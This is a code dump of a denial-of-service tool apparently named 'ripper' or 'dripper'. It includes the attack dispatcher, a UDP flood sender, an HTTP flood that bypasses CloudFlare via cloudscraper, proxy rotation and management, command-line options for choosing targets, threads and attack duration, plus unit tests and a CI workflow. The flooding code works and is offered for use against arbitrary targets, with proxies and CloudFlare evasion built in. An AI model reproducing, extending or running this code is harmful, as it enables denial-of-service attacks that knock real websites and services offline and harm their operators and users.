events_journal.exception(ep, target=self._target) 58 | self._ctx.proxy_manager.delete_proxy_sync(self._proxy) 59 | except Exception as e: 60 | events_journal.exception(e, target=self._target) 61 | else: 62 | self._target.stats.packets.status_sent(sent_bytes=sent) 63 | self._proxy.report_success() if self._proxy is not None else 0 64 | return True 65 | 66 | return False 67 | -------------------------------------------------------------------------------- /ripper/actions/attack.py: -------------------------------------------------------------------------------- 1 | import threading 2 | from threading import Thread, Event 3 | 4 | from ripper.actions.attack_method import AttackMethod 5 | from ripper.actions.http_bypass import HttpBypass 6 | from ripper.actions.http_flood import HttpFlood 7 | from ripper.actions.tcp_flood import TcpFlood 8 | from ripper.actions.udp_flood import UdpFlood 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | # Forward Reference 12 | Context = 'Context' 13 | Target = 'Target' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | # noinspection PyTypeChecker 19 | attack_methods: list[AttackMethod] = [ 20 | UdpFlood, 21 | TcpFlood, 22 | HttpFlood, 23 | HttpBypass, 24 | ] 25 | 26 | attack_method_labels: list[str] = list(map(lambda am: am.label, attack_methods)) 27 | 28 | 29 | def attack_method_factory(_ctx: Context, target: Target): 30 | attack_method_name = target.attack_method 31 | # events_journal.info(f'Set attack method to {target.attack_method}', target=target) 32 | if attack_method_name == 'udp-flood': 33 | return UdpFlood(target=target, context=_ctx) 34 | elif attack_method_name == 'http-flood': 35 | return HttpFlood(target=target, context=_ctx) 36 | elif attack_method_name == 'tcp-flood': 37 | return TcpFlood(target=target, context=_ctx) 38 | elif attack_method_name == 'http-bypass': 39 | return HttpBypass(target=target, context=_ctx) 40 | # Dangerous, may lead to exception 41 | return None 42 | 43 | 44 | class Attack(Thread): 45 | """This class creates threads with specified attack method.""" 46 | _ctx: Context 47 | target: Target 48 | stop_event: Event = None 49 | 50 | def __init__(self, _ctx: Context, target: Target): 51 | """ 52 | :param target: Target IPv4 address and destination port. 53 | :param method: Attack method. 54 | """ 55 | Thread.__init__(self, daemon=True) 56 | self._ctx = _ctx 57 | self.target = target 58 | self.target.add_attack_thread(self) 59 | self.stop_event = threading.Event() 60 | 61 | def stop(self): 62 | self.stop_event.set() 63 | 64 | def run(self): 65 | self.target.init() 66 | runner = attack_method_factory(_ctx=self._ctx, target=self.target) 67 | 68 | if self._ctx.dry_run: 69 | runner() 70 | exit(0) 71 | 72 | while not self.stop_event.is_set(): 73 | runner() 74 | -------------------------------------------------------------------------------- /ripper/actions/udp_flood.py: -------------------------------------------------------------------------------- 1 | from contextlib import suppress 2 | from socket import socket 3 | from typing import Any 4 | 5 | from ripper.common import generate_random_bytes 6 | from ripper.context.events_journal import EventsJournal 7 | from ripper.context.target import Target 8 | from ripper.constants import * 9 | from ripper.actions.attack_method import AttackMethod 10 | from ripper.proxy import Proxy 11 | 12 | # Forward Reference 13 | Context = 'Context' 14 | 15 | events_journal = EventsJournal() 16 | 17 | 18 | # TODO add support for SOCKS5 proxy if proxy supports associate request 19 | # https://stackoverflow.com/a/47079318/2628125 20 | # https://datatracker.ietf.org/doc/html/rfc1928 21 | # https://blog.birost.com/a?ID=00100-38682fbb-83c3-49d7-8cfc-406b05bf086c 22 | # PySocks has issues with basic implementation 23 | class UdpFlood(AttackMethod): 24 | """UDP Flood method.""" 25 | 26 | name: str = 'UDP Flood' 27 | label: str = 'udp-flood' 28 | 29 | _sock: socket 30 | _target: Target 31 | _ctx: Context 32 | _proxy: Proxy = None 33 | 34 | def __init__(self, target: Target, context: Context): 35 | self._target = target 36 | self._ctx = context 37 | 38 | def create_connection(self) -> socket: 39 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 40 | conn = self._ctx.sock_manager.create_udp_socket() 41 | 42 | return conn 43 | 44 | def __call__(self, *args, **kwargs): 45 | with suppress(Exception), self.create_connection() as udp_conn: 46 | self._target.stats.connect.status_success() 47 | events_journal.info('Creating new UDP connection...', target=self._target) 48 | while self.sendto(udp_conn): 49 | if self._ctx.dry_run: 50 | break 51 | continue 52 | 53 | self._target.stats.connect.status_failed() 54 | # self._ctx.sock_manager.close_socket() 55 | 56 | def sendto(self, sock: socket) -> bool: 57 | try: 58 | send_bytes = generate_random_bytes(self._target.min_random_packet_len, self._target.max_random_packet_len) 59 | sent = sock.sendto(send_bytes, self._target.hostip_port_tuple()) 60 | except socket.gaierror as e: 61 | events_journal.exception(e, target=self._target) 62 | events_journal.error(GETTING_SERVER_IP_ERR_MSG, target=self._target) 63 | except Exception as e: 64 | events_journal.exception(e, target=self._target) 65 | else: 66 | self._target.stats.packets.status_sent(sent_bytes=sent) 67 | return True 68 | 69 | return False 70 | -------------------------------------------------------------------------------- /tests/test_targets_manager_packets_stats.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import time 3 | from random import randint 4 | 5 | from ripper.context.target import Target 6 | from ripper.targets_manager import TargetsManagerPacketsStats 7 | 8 | 9 | class DescribeTargetsManagerPacketsStats: 10 | def build_targets_list(self): 11 | return [ 12 | Target(target_uri='http://google.com'), 13 | Target(target_uri='http://medium.com'), 14 | Target(target_uri='http://github.com'), 15 | ] 16 | 17 | def increase_target_packets(self, target: Target, total_sent: int, total_sent_bytes: int): 18 | target.stats.packets.total_sent += total_sent 19 | target.stats.packets.total_sent_bytes += total_sent_bytes 20 | 21 | def increase_target_packets_list(self, targets: list[Target]): 22 | tmps1 = TargetsManagerPacketsStats(targets) 23 | before_total_sent = tmps1.total_sent 24 | before_total_sent_bytes = tmps1.total_sent_bytes 25 | expected_total_sent = before_total_sent 26 | expected_total_sent_bytes = before_total_sent_bytes 27 | for target in targets: 28 | sent = randint(0, 10) 29 | sent_bytes = randint(0, 10000) 30 | expected_total_sent += sent 31 | expected_total_sent_bytes += sent_bytes 32 | self.increase_target_packets(target, sent, sent_bytes) 33 | tmps2 = TargetsManagerPacketsStats(targets=targets) 34 | assert tmps2.total_sent == expected_total_sent 35 | assert tmps2.total_sent_bytes == expected_total_sent_bytes 36 | assert tmps2 > tmps1 37 | assert tmps1 < tmps2 38 | 39 | def it_should_accumulate_data_from_targets(self): 40 | targets = self.build_targets_list() 41 | tmps = TargetsManagerPacketsStats(targets=targets) 42 | assert tmps.total_sent == 0 43 | assert tmps.total_sent_bytes == 0 44 | self.increase_target_packets_list(targets) 45 | self.increase_target_packets_list(targets) 46 | self.increase_target_packets_list(targets) 47 | 48 | def it_should_calculate_average_with_duration(self): 49 | targets = self.build_targets_list() 50 | self.increase_target_packets_list(targets) 51 | tmps = TargetsManagerPacketsStats(targets=targets) 52 | avg_sent_per_second = tmps.avg_sent_per_second 53 | avg_sent_bytes_per_second = tmps.avg_sent_bytes_per_second 54 | time.sleep(1) 55 | tmps = TargetsManagerPacketsStats(targets=targets) 56 | assert avg_sent_per_second > tmps.avg_sent_per_second 57 | assert avg_sent_bytes_per_second > tmps.avg_sent_bytes_per_second 58 | -------------------------------------------------------------------------------- /tests/test_attack_http_flood.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from collections import namedtuple 3 | 4 | from ripper.actions.http_flood import HttpFlood 5 | from ripper.context.context import Context 6 | from ripper.headers_provider import HeadersProvider 7 | 8 | Args = namedtuple('Args', 'targets http_method threads_count') 9 | 10 | 11 | class DescribeHttpFloodAttackMethod: 12 | target_uri: str = 'tcp://localhost' 13 | 14 | def it_has_some_headers(self): 15 | args = Args( 16 | targets=[self.target_uri], 17 | http_method='GET', 18 | threads_count=100, 19 | ) 20 | ctx = Context(args) 21 | ctx.__init__(args) 22 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 23 | 24 | actual = http_flood_am.headers() 25 | assert actual.get('Content-Length') == '0' 26 | with_content = http_flood_am.headers('{"test": 1}') 27 | assert with_content.get('Content-Length') == '11' 28 | 29 | def it_has_payload(self): 30 | args = Args( 31 | targets=[self.target_uri], 32 | http_method='POST', 33 | threads_count=100, 34 | ) 35 | ctx = Context(args) 36 | ctx.__init__(args) 37 | ctx.headers_provider.user_agents = ['Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0'] 38 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 39 | 40 | body = '{"test":1}' 41 | headers = '\r\n'.join([f'{key}: {value}' for (key, value) in http_flood_am.headers().items()]) 42 | expected = 'POST / HTTP/1.1\r\nHost: localhost\r\n' + headers + '\r\n\r\n' 43 | 44 | payload = http_flood_am.payload() 45 | assert payload.split('\r\n') == expected.split('\r\n') 46 | 47 | payload_with_body = http_flood_am.payload(body) 48 | headers_with_body = '\r\n'.join([f'{key}: {value}' for (key, value) in http_flood_am.headers(body).items()]) 49 | expected_with_body = 'POST / HTTP/1.1\r\nHost: localhost\r\n' + headers_with_body + '\r\n' + f'{body}\r\n\r\n' 50 | assert payload_with_body.split('\r\n') == expected_with_body.split('\r\n') 51 | 52 | def it_has_correct_name(self): 53 | args = Args( 54 | targets=[self.target_uri], 55 | http_method='GET', 56 | threads_count=100, 57 | ) 58 | ctx = Context(args) 59 | ctx.__init__(args) 60 | http_flood_am = HttpFlood(target=ctx.targets_manager.targets[0], context=ctx) 61 | assert http_flood_am.name == 'HTTP Flood' 62 | assert http_flood_am.label == 'http-flood' 63 | 64 | @pytest.fixture(scope='session', autouse=True) 65 | def refresh_headers_provider(self): 66 | HeadersProvider().refresh() 67 | -------------------------------------------------------------------------------- /ripper/proxy.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import socks 3 | import time 4 | from enum import Enum 5 | 6 | from ripper.common import ns2s 7 | 8 | 9 | class ProxyType(Enum): 10 | SOCKS4 = 'SOCKS4' 11 | SOCKS5 = 'SOCKS5' 12 | HTTP = 'HTTP' 13 | 14 | 15 | class Proxy: 16 | def __init__(self, host: str, port: int, username: str = None, password: str = None, proxy_type: ProxyType = ProxyType.SOCKS5, rdns: bool = True): 17 | self.host = host 18 | self.port = int(port) 19 | self.username = username 20 | self.password = password 21 | self.rdns = rdns 22 | self.proxy_type = proxy_type 23 | 24 | self.last_success_time = 0 25 | self.success_cnt = 0 26 | self.last_failure_time = 0 27 | self.failure_cnt = 0 28 | 29 | def report_success(self): 30 | self.last_success_time = time.time_ns() 31 | self.success_cnt += 1 32 | 33 | def report_failure(self): 34 | self.last_failure_time = time.time_ns() 35 | self.failure_cnt += 1 36 | 37 | def seconds_to_last_success(self): 38 | now_ns = time.time_ns() 39 | return ns2s(now_ns - self.last_success_time) 40 | 41 | def seconds_to_last_failure(self): 42 | now_ns = time.time_ns() 43 | return ns2s(now_ns - self.last_success_time) 44 | 45 | # mutates socket 46 | # https://pypi.org/project/PySocks/ 47 | def decorate_socket(self, s): 48 | if self.username and self.password: 49 | s.set_proxy(socks.PROXY_TYPE_SOCKS5, self.host, self.port, 50 | self.rdns, self.username, self.password) 51 | else: 52 | s.set_proxy(socks.PROXY_TYPE_SOCKS5, 53 | self.host, self.port, self.rdns) 54 | return s 55 | 56 | def id(self): 57 | if self.username and self.password: 58 | return f'SOCKS5:{self.host}:{self.port}:{self.rdns}:{self.username}:{self.password}' 59 | else: 60 | return f'SOCKS5:{self.host}:{self.port}:{self.rdns}' 61 | 62 | def __eq__(self, other): 63 | if not isinstance(other, Proxy): 64 | # don't attempt to compare against unrelated types 65 | return NotImplemented 66 | 67 | return self.host == other.host \ 68 | and self.port == other.port \ 69 | and self.username == other.username \ 70 | and self.password == other.password \ 71 | and self.rdns == other.rdns 72 | 73 | def validate(self): 74 | try: 75 | http_socket = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM) 76 | self.decorate_socket(http_socket) 77 | http_socket.settimeout(5) 78 | http_socket.connect(('google.com', 80)) 79 | # except socks.ProxyError: 80 | except: 81 | return False 82 | return True 83 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | ### Python template 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | *.py[cod] 6 | *$py.class 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | .eggs/ 19 | lib/ 20 | lib64/ 21 | parts/ 22 | sdist/ 23 | var/ 24 | wheels/ 25 | pip-wheel-metadata/ 26 | share/python-wheels/ 27 | *.egg-info/ 28 | .installed.cfg 29 | *.egg 30 | MANIFEST 31 | 32 | # PyInstaller 33 | # Usually these files are written by a python script from a template 34 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 35 | *.manifest 36 | *.spec 37 | 38 | # Installer logs 39 | pip-log.txt 40 | pip-delete-this-directory.txt 41 | 42 | # Unit test / coverage reports 43 | htmlcov/ 44 | .tox/ 45 | .nox/ 46 | .coverage 47 | .coverage.* 48 | .cache 49 | nosetests.xml 50 | coverage.xml 51 | *.cover 52 | *.py,cover 53 | .hypothesis/ 54 | .pytest_cache/ 55 | cover/ 56 | 57 | # Translations 58 | *.mo 59 | *.pot 60 | 61 | # Django stuff: 62 | *.log 63 | local_settings.py 64 | db.sqlite3 65 | db.sqlite3-journal 66 | 67 | # Flask stuff: 68 | instance/ 69 | .webassets-cache 70 | 71 | # Scrapy stuff: 72 | .scrapy 73 | 74 | # Sphinx documentation 75 | docs/_build/ 76 | 77 | # PyBuilder 78 | .pybuilder/ 79 | target/ 80 | 81 | # Jupyter Notebook 82 | .ipynb_checkpoints 83 | 84 | # IPython 85 | profile_default/ 86 | ipython_config.py 87 | 88 | # pyenv 89 | # For a library or package, you might want to ignore these files since the code is 90 | # intended to run in multiple environments; otherwise, check them in: 91 | # .python-version 92 | 93 | # pipenv 94 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 95 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 96 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 97 | # install all needed dependencies. 98 | #Pipfile.lock 99 | 100 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 101 | __pypackages__/ 102 | 103 | # Celery stuff 104 | celerybeat-schedule 105 | celerybeat.pid 106 | 107 | # SageMath parsed files 108 | *.sage.py 109 | 110 | # Environments 111 | .env 112 | .venv 113 | env/ 114 | venv/ 115 | ENV/ 116 | env.bak/ 117 | venv.bak/ 118 | 119 | # Spyder project settings 120 | .spyderproject 121 | .spyproject 122 | 123 | # Rope project settings 124 | .ropeproject 125 | 126 | # mkdocs documentation 127 | /site 128 | 129 | # mypy 130 | .mypy_cache/ 131 | .dmypy.json 132 | dmypy.json 133 | 134 | # Pyre type checker 135 | .pyre/ 136 | 137 | # pytype static type analyzer 138 | .pytype/ 139 | 140 | # Cython debug symbols 141 | cython_debug/ 142 | 143 | .idea/ 144 | 145 | # Proxy lists 146 | proxylist.txt 147 | 148 | # Debug 149 | debug.log 150 | -------------------------------------------------------------------------------- /ripper/actions/http_bypass.py: -------------------------------------------------------------------------------- 1 | import time 2 | from contextlib import suppress 3 | 4 | from cloudscraper import CloudScraper, create_scraper 5 | from requests import Response 6 | 7 | from ripper.actions.http_flood import HttpFlood 8 | from ripper.context.target import Target 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | # Forward Reference 12 | Context = 'Context' 13 | 14 | events_journal = EventsJournal() 15 | 16 | 17 | class RateLimitException(BaseException): 18 | """Exception raised for rate limit response.""" 19 | 20 | code: int 21 | """Error code""" 22 | message: str 23 | """Description of the error""" 24 | 25 | def __init__(self, code: int, message: str): 26 | self.code = code 27 | self.message = message 28 | super().__init__(self.message) 29 | 30 | def __str__(self): 31 | return f'{self.code}: {self.message}' 32 | 33 | 34 | class HttpBypass(HttpFlood): 35 | """HTTP Flood method with CloudFlare bypass .""" 36 | 37 | name: str = 'HTTP Flood with CloudFlare bypass' 38 | label: str = 'http-bypass' 39 | 40 | _http_connect: CloudScraper = None 41 | 42 | def __init__(self, target: Target, context: Context): 43 | super().__init__(target, context) 44 | 45 | def __call__(self, *args, **kwargs): 46 | browser = { 47 | 'browser': 'chrome', 48 | 'platform': 'android', 49 | 'desktop': False 50 | } 51 | with suppress(Exception), create_scraper(browser=browser) as self._http_connect: 52 | self._target.stats.connect.status_success() 53 | events_journal.info('Creating CloudFlare scraper connection.', target=self._target) 54 | while self.send(self._http_connect): 55 | if self._ctx.dry_run: 56 | break 57 | continue 58 | self._target.stats.connect.status_failed() 59 | 60 | def send(self, scraper: CloudScraper): 61 | try: 62 | with scraper.get(self._target.http_url, 63 | headers=self._ctx.headers_provider.headers, 64 | proxies=self._proxy) as response: 65 | self._target.stats.http_stats[response.status_code] += 1 66 | self.check_rate_limit(response) 67 | except RateLimitException as e: 68 | events_journal.warn( 69 | f'{type(e).__name__} {e.__str__()}, sleep for 3 sec', target=self._target) 70 | time.sleep(3.01) 71 | return True 72 | except Exception as e: 73 | events_journal.exception(e, target=self._target) 74 | else: 75 | sent_bytes = self._size_of_request(response.request) 76 | self._target.stats.packets.status_sent(sent_bytes) 77 | self._proxy.report_success() if self._proxy is not None else 0 78 | return True 79 | return False 80 | 81 | @staticmethod 82 | def check_rate_limit(response: Response): 83 | """Check status code for Rate limits applied and throws exception.""" 84 | if response.status_code in [429, 460, 463, 520, 521, 522, 523, 524, 525, 526, 527]: 85 | raise RateLimitException(response.status_code, response.reason) 86 | 87 | @staticmethod 88 | def _size_of_request(request) -> int: 89 | size: int = len(request.method) +\ 90 | len(request.url) + \ 91 | len('\r\n'.join(f'{k}: {v}' for k, v in request.headers.items())) 92 | return size 93 | -------------------------------------------------------------------------------- /ripper/proxy_manager.py: -------------------------------------------------------------------------------- 1 | import random 2 | import threading 3 | from typing import List 4 | 5 | from ripper.common import read_file_lines 6 | from ripper.proxy import Proxy, ProxyType 7 | from ripper.constants import PROXY_MAX_FAILURE_RATIO, PROXY_MIN_VALIDATION_REQUESTS 8 | 9 | lock = threading.Lock() 10 | 11 | 12 | class ProxyManager: 13 | """Manager for proxy collection.""" 14 | 15 | proxy_list: list[Proxy] = [] 16 | """Active proxies.""" 17 | proxy_list_initial_len: int = 0 18 | """Count of proxies during the last application.""" 19 | __proxy_extract_counter: int = 0 20 | """Vacuum operation is called automatically on every PROXY_MIN_VALIDATION_REQUESTS proxy extractions.""" 21 | proxy_type: ProxyType = ProxyType.SOCKS5 22 | """Type of proxy (SOCKS5, SOCKS4, HTTP)""" 23 | 24 | def set_proxy_type(self, proxy_type: str): 25 | proxy_type_lc = proxy_type.lower() 26 | if proxy_type_lc == 'socks5': 27 | self.proxy_type = ProxyType.SOCKS5 28 | elif proxy_type_lc == 'socks4': 29 | self.proxy_type = ProxyType.SOCKS4 30 | elif proxy_type_lc == 'http': 31 | self.proxy_type = ProxyType.HTTP 32 | else: 33 | self.proxy_type = None 34 | 35 | def set_proxy_list(self, proxy_list: list[Proxy]): 36 | self.proxy_list = proxy_list 37 | self.proxy_list_initial_len = len(proxy_list) 38 | 39 | # TODO prioritize faster proxies 40 | def get_random_proxy(self) -> Proxy: 41 | self.__proxy_extract_counter += 1 42 | if self.__proxy_extract_counter % PROXY_MIN_VALIDATION_REQUESTS == 0: 43 | self.vacuum() 44 | if not self.proxy_list or not len(self.proxy_list): 45 | return None 46 | return random.choice(self.proxy_list) 47 | 48 | def find_proxy_index(self, proxy: Proxy) -> int: 49 | """Returns -1 if not found.""" 50 | try: 51 | return self.proxy_list.index(proxy) 52 | # except ValueError: 53 | except: 54 | return -1 55 | 56 | def __delete_proxy(self, proxy: Proxy) -> bool: 57 | index = self.find_proxy_index(proxy) 58 | if index >= 0: 59 | self.proxy_list.pop(index) 60 | return index >= 0 61 | 62 | def delete_proxy_sync(self, proxy: Proxy) -> bool: 63 | lock.acquire() 64 | is_deleted = self.__delete_proxy(proxy) 65 | lock.release() 66 | return is_deleted 67 | 68 | def __validate_proxy(self, proxy: Proxy) -> bool: 69 | total_cnt = proxy.success_cnt + proxy.failure_cnt 70 | if total_cnt < PROXY_MIN_VALIDATION_REQUESTS: 71 | return True 72 | failure_ratio = proxy.failure_cnt / proxy.success_cnt 73 | return failure_ratio < PROXY_MAX_FAILURE_RATIO 74 | 75 | def vacuum(self) -> int: 76 | """Removes proxies which are not valid.""" 77 | new_proxy_list = list(filter(lambda proxy: self.__validate_proxy(proxy), self.proxy_list)) 78 | cnt = len(self.proxy_list) - len(new_proxy_list) 79 | if cnt > 0: 80 | self.proxy_list = new_proxy_list 81 | return cnt 82 | 83 | def __parse_proxy_line(self, line: str) -> Proxy: 84 | # ip:port:username:password or ip:port 85 | args = line.strip().split(':') 86 | if len(args) not in [2, 4]: 87 | raise ValueError(args) 88 | return Proxy(*args, proxy_type=self.proxy_type) 89 | 90 | def __parse_proxy_lines(self, lines: list[str]) -> Proxy: 91 | proxy_list = [] 92 | for line in lines: 93 | proxy_list.append(self.__parse_proxy_line(line)) 94 | return proxy_list 95 | 96 | def update_proxy_list_from_file(self, filename: str) -> List[Proxy]: 97 | lines = read_file_lines(filename) 98 | proxy_list = self.__parse_proxy_lines(lines) 99 | self.set_proxy_list(proxy_list) 100 | return proxy_list 101 | -------------------------------------------------------------------------------- /ripper/arg_parser.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from optparse import OptionParser, IndentedHelpFormatter 3 | 4 | from ripper.constants import * 5 | from ripper.actions.attack import attack_method_labels 6 | 7 | 8 | def create_parser() -> OptionParser: 9 | """Initialize parser with options.""" 10 | formatter = IndentedHelpFormatter( 11 | indent_increment=2, 12 | max_help_position=56, 13 | width=120, 14 | short_first=1 15 | ) 16 | parser = OptionParser(usage=USAGE, epilog=EPILOG, version=f'%prog {VERSION}', formatter=formatter) 17 | parser_add_options(parser) 18 | 19 | return parser 20 | 21 | 22 | def parser_add_options(parser: OptionParser) -> None: 23 | """Add options to a parser.""" 24 | parser.add_option('-s', '--targets', 25 | dest='targets', action='append', 26 | help='Attack target in {scheme}://{hostname}[:{port}][{path}] format. Multiple targets allowed.') 27 | parser.add_option('--targets-list', 28 | dest='targets_list', type='str', 29 | help='File (fs or http/https) with targets in {scheme}://{hostname}[:{port}][{path}] line format.') 30 | parser.add_option('-m', '--method', 31 | dest='attack_method', type='str', 32 | help=f'Attack method: {", ".join(attack_method_labels)}') 33 | parser.add_option('-e', '--http-method', 34 | dest='http_method', type='str', default=ARGS_DEFAULT_HTTP_ATTACK_METHOD, 35 | help=f'HTTP method. Default: {ARGS_DEFAULT_HTTP_ATTACK_METHOD}') 36 | parser.add_option('-t', '--threads', 37 | dest='threads_count', type='str', default=ARGS_DEFAULT_THREADS_COUNT, 38 | help=f'Total fixed threads count (number) or "auto" (text) for automatic threads selection. Default: {ARGS_DEFAULT_THREADS_COUNT}') 39 | parser.add_option('--min-random-packet-len', 40 | dest='min_random_packet_len', type='int', 41 | help=f'Min random packets length. Default: {DEFAULT_MIN_RND_PACKET_LEN}') 42 | parser.add_option('-l', '--max-random-packet-len', 43 | dest='max_random_packet_len', type='int', 44 | help=f'Max random packets length. Default: {DEFAULT_MAX_RND_PACKET_LEN} for udp/tcp') 45 | parser.add_option('-y', '--proxy-list', 46 | dest='proxy_list', 47 | help='File (fs or http/https) with proxies in ip:port:username:password line format. Proxies will be ignored in udp attack!') 48 | parser.add_option('-k', '--proxy-type', 49 | dest='proxy_type', type='str', default=ARGS_DEFAULT_PROXY_TYPE, 50 | help=f'Type of proxy to work with. Supported types: socks5, socks4, http. Default: {ARGS_DEFAULT_PROXY_TYPE}') 51 | parser.add_option('-c', '--health-check', 52 | dest='health_check', type='int', default=ARGS_DEFAULT_HEALTH_CHECK, 53 | help=f'Controls health check availability. Turn on: 1, turn off: 0. Default: {ARGS_DEFAULT_HEALTH_CHECK}') 54 | parser.add_option('-o', '--socket-timeout', 55 | # default value is not set here to keep dynamic logic during initialization 56 | dest='socket_timeout', type='int', default=ARGS_DEFAULT_SOCK_TIMEOUT, 57 | help=f'Timeout for socket connection is seconds. Default (seconds): {ARGS_DEFAULT_SOCK_TIMEOUT} without proxy, {2*ARGS_DEFAULT_SOCK_TIMEOUT} with proxy') 58 | parser.add_option('--dry-run', 59 | dest='dry_run', action="store_true", 60 | help='Print formatted output without full script running.') 61 | parser.add_option('--log-size', 62 | dest='log_size', type='int', default=DEFAULT_LOG_SIZE, 63 | help='Set the Events Log history frame length.') 64 | parser.add_option('--log-level', 65 | dest='event_level', type='str', default=DEFAULT_LOG_LEVEL, 66 | help='Log level for events board. Supported levels: info, warn, error, none.') 67 | parser.add_option('-d', '--duration', 68 | dest='duration', type='int', 69 | help='Attack duration in seconds. After this duration script will stop it\'s execution.') 70 | 71 | def print_usage(): 72 | """Wrapper for Logo with help.""" 73 | print(LOGO_NOCOLOR) 74 | create_parser().print_help() 75 | 76 | sys.exit() 77 | -------------------------------------------------------------------------------- /ripper/context/events_journal.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import textwrap 3 | import threading 4 | from queue import Queue 5 | 6 | from ripper.constants import * 7 | from ripper.common import Singleton 8 | 9 | Target = 'Target' 10 | 11 | 12 | class EventLevel: 13 | none: int = 0 14 | error: int = 1 15 | warn: int = 2 16 | info: int = 3 17 | 18 | @staticmethod 19 | def get_id_by_name(name: str) -> int: 20 | if name == 'none': 21 | return EventLevel.none 22 | if name == 'error': 23 | return EventLevel.error 24 | if name == 'warn': 25 | return EventLevel.warn 26 | if name == 'info': 27 | return EventLevel.info 28 | 29 | @staticmethod 30 | def get_name_by_id(id: int) -> str: 31 | if id == EventLevel.none: 32 | return 'none' 33 | if id == EventLevel.error: 34 | return 'error' 35 | if id == EventLevel.warn: 36 | return 'warn' 37 | if id == EventLevel.info: 38 | return 'info' 39 | 40 | 41 | class Event: 42 | _level: int = EventLevel.none 43 | _target: Target = None 44 | _message: str = None 45 | 46 | def __init__(self, level: int, message: str, target: Target = None): 47 | self._level = level 48 | self._message = message 49 | self._target = target 50 | 51 | def get_level_color(self): 52 | if self._level == EventLevel.warn: 53 | return 'bold orange1 reverse' 54 | if self._level == EventLevel.error: 55 | return 'bold white on red3' 56 | return 'bold blue reverse' 57 | 58 | def format_message(self): 59 | now = datetime.datetime.now().strftime(DATE_TIME_SHORT) 60 | thread_name = threading.current_thread().name.lower() 61 | log_level_name = EventLevel.get_name_by_id(self._level) 62 | log_level_color = self.get_level_color() 63 | locator = f'target-{self._target.index}' if self._target is not None else 'global' 64 | msg_limited = textwrap.shorten(self._message, width=50, placeholder='...') 65 | return f'[dim][bold][cyan][{now}][/] [{log_level_color}]{log_level_name:^7}[/] {locator:9} {thread_name:11} {msg_limited}' 66 | 67 | 68 | class EventsJournal(metaclass=Singleton): 69 | """Collect and represent various logs and events_journal.""" 70 | _lock = None 71 | _queue: Queue = None 72 | _buffer: list[str] = None 73 | _max_event_level: int = EventLevel.none 74 | 75 | def __init__(self): 76 | self._lock = threading.Lock() 77 | self._queue = Queue() 78 | self.set_log_size(DEFAULT_LOG_SIZE) 79 | self.set_max_event_level(DEFAULT_LOG_LEVEL) 80 | 81 | def set_log_size(self, size): 82 | self._buffer = [''] * size 83 | 84 | def set_max_event_level(self, max_event_level_name: str): 85 | self._max_event_level = EventLevel.get_id_by_name(max_event_level_name) 86 | 87 | def get_max_event_level(self): 88 | return self._max_event_level 89 | 90 | def get_log(self) -> list[str]: 91 | with self._lock: 92 | if not self._queue.empty(): 93 | self._buffer.pop(0) 94 | self._buffer.append(self._queue.get()) 95 | 96 | return self._buffer 97 | 98 | def info(self, message: str, target: Target = None): 99 | if self._max_event_level >= EventLevel.info: 100 | self._push_event(Event( 101 | level=EventLevel.info, 102 | message=message, 103 | target=target, 104 | )) 105 | 106 | def warn(self, message: str, target: Target = None): 107 | if self._max_event_level >= EventLevel.warn: 108 | self._push_event(Event( 109 | level=EventLevel.warn, 110 | message=message, 111 | target=target, 112 | )) 113 | 114 | def error(self, message: str, target: Target = None): 115 | if self._max_event_level >= EventLevel.error: 116 | self._push_event(Event( 117 | level=EventLevel.error, 118 | message=message, 119 | target=target, 120 | )) 121 | 122 | def exception(self, ex, target: Target = None): 123 | self._push_event(Event( 124 | level=EventLevel.error, 125 | message=f'{type(ex).__name__}: {ex.__str__()[:128]}', 126 | target=target, 127 | )) 128 | 129 | def _push_event(self, event: Event): 130 | with self._lock: 131 | self._queue.put(event.format_message()) 132 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: Build 2 | 3 | on: 4 | push: 5 | paths-ignore: 6 | - '**.md' 7 | pull_request: 8 | paths-ignore: 9 | - '**.md' 10 | 11 | defaults: 12 | run: 13 | shell: pwsh 14 | 15 | env: 16 | IMAGE_NAME: alexmon1989/dripper 17 | 18 | jobs: 19 | build: 20 | name: Build on ${{ matrix.os }} 21 | runs-on: ${{ matrix.os }} 22 | strategy: 23 | fail-fast: false 24 | matrix: 25 | os: [ ubuntu-20.04, macos-11, windows-2019 ] 26 | 27 | steps: 28 | - name: Checkout 29 | uses: actions/checkout@v2 30 | 31 | - name: Setup Python 32 | uses: actions/setup-python@v2 33 | with: 34 | python-version: 3.x 35 | 36 | - name: Set environment variables 37 | shell: bash 38 | run: | 39 | # Short name for current branch. For PRs, use target branch (base ref) 40 | GIT_BRANCH=${GITHUB_BASE_REF:-${GITHUB_REF#refs/heads/}} 41 | echo "GIT_BRANCH=$GIT_BRANCH" >> $GITHUB_ENV 42 | 43 | - name: Setup Python packages 44 | run: | 45 | python3 -m pip install -r requirements.test.txt 46 | python3 -m pip install pytest-github-actions-annotate-failures 47 | python3 -m pip install --upgrade pip -e . 48 | 49 | - name: Fast attack test 50 | if: runner.os == 'Linux' 51 | run: | 52 | dripper -t 1 -s https://httpbin.org:443 --dry-run 53 | 54 | - name: Run Tests with coverage 55 | run: python3 -m pytest tests/ -v 56 | 57 | - name: Set up QEMU 58 | if: runner.os == 'Linux' 59 